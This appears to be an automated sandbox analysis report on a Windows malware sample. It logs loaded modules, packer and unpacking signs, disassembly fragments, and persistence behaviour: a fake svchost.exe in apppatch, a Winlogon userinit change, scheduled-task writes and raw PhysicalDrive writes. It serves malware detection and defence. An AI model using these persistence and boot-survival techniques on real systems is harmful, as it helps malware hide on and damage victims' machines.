Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: schannel.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: UMwpXhA46R.exeStatic file information: File size 1179648 > 1048576
Source: UMwpXhA46R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qedyvap\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\gacyfeb.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb\WinSCard.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qegynul\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3421903093.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbwkernel32.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbll\wntdll.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb552 source: UMwpXhA46R.exe, svchost.exe.0.dr
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: UMwpXhA46R.exe, svchost.exe.0.dr
Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.3413471748.00000000008BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb\** source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.3425216868.000000000827B000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\winsta.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbernelbase.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009277000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516200393.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2606987058.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2520248189.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2607414214.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2585840730.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000000.2578627983.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000000.2588407921.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2670222537.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000000.2633847837.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000000.2650762709.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2734291116.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000000.2708390726.00000000002DE000.00000002.00000001.01000000.00000009.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000000.2731091721.00000000002DE000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wrpcrt4.pdb1.3.6.1.4.1.311.60.3.2szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\qexyfag.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3406954551.0000000000812000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\UMwpXhA46R.exeUnpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack .text:ER;.j:R;.nkytZ:R;.N:R;.fc:W;.data:W;.s:W;.w:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeUnpacked PE file: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack
Source: C:\Users\user\Desktop\UMwpXhA46R.exeUnpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_00401FC0
Source: svchost.exe.0.drStatic PE information: real checksum: 0x48bbd2ed should be: 0x121dac
Source: UMwpXhA46R.exeStatic PE information: real checksum: 0x663958d2 should be: 0x121dac
Source: UMwpXhA46R.exeStatic PE information: section name: .j
Source: UMwpXhA46R.exeStatic PE information: section name: .nkytZ
Source: UMwpXhA46R.exeStatic PE information: section name: .N
Source: UMwpXhA46R.exeStatic PE information: section name: .fc
Source: UMwpXhA46R.exeStatic PE information: section name: .s
Source: UMwpXhA46R.exeStatic PE information: section name: .w
Source: svchost.exe.0.drStatic PE information: section name: .j
Source: svchost.exe.0.drStatic PE information: section name: .nkytZ
Source: svchost.exe.0.drStatic PE information: section name: .N
Source: svchost.exe.0.drStatic PE information: section name: .fc
Source: svchost.exe.0.drStatic PE information: section name: .s
Source: svchost.exe.0.drStatic PE information: section name: .w
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004000C2 push esp; ret 0_2_004000C3
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0040008D push FB0DB0C3h; ret 0_2_004000B7
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C903 push cs; ret 0_2_0044C918
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C939 push cs; iretd 0_2_0044C948
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0044C26D push es; iretd 0_2_0044C27C
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00448CA0 push eax; ret 0_2_00448CCE
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0213065B push ebx; ret 0_2_02130677
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_0213065B push dword ptr [esp+48h]; ret 0_2_02130747
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_02130678 push dword ptr [esp+48h]; ret 0_2_02130747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004000C2 push esp; ret 2_2_004000C3
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040008D push FB0DB0C3h; ret 2_2_004000B7
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C903 push cs; ret 2_2_0044C918
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C939 push cs; iretd 2_2_0044C948
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044C26D push es; iretd 2_2_0044C27C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00448CA0 push eax; ret 2_2_00448CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B03 push cs; ret 2_2_02CB6B18
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACB03 push esi; retf 2_2_02CACB04
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB6B39 push cs; iretd 2_2_02CB6B48
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB28A0 push eax; ret 2_2_02CB28CE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE990 push esi; retf 2_2_02CAE994
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CACEB1 push esi; retf 2_2_02CACEB5
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CAE62D push esi; retf 2_2_02CAE631
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02CB646D push es; iretd 2_2_02CB647C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E726D push es; iretd 2_2_029E727C
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D4392 push ebp; retf 2_2_029D4393
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029D410C push ebp; retf 2_2_029D410D
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_029E3CA0 push eax; ret 2_2_029E3CCE
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B20678 push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push ebx; ret 2_2_02B20677
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02B2065B push dword ptr [esp+48h]; ret 2_2_02B20747
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012828A0 push eax; ret 6_2_012828CE

Persistence and Installation Behavior

Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_02C82030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_01252030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 7_2_01052030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 9_2_00A32030
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Executable created and started: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\ 0_2_00403440

Boot Survival

Source: C:\Windows\apppatch\svchost.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 2_2_02C82030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 6_2_01252030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 7_2_01052030
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,WriteFile,WriteFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u 9_2_00A32030
Source: C:\Windows\apppatch\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinit
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

Source: c:\users\user\desktop\umwpxha46r.exe File moved: C:\Users\user\AppData\Local\Temp\6D41.tmp
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 8000
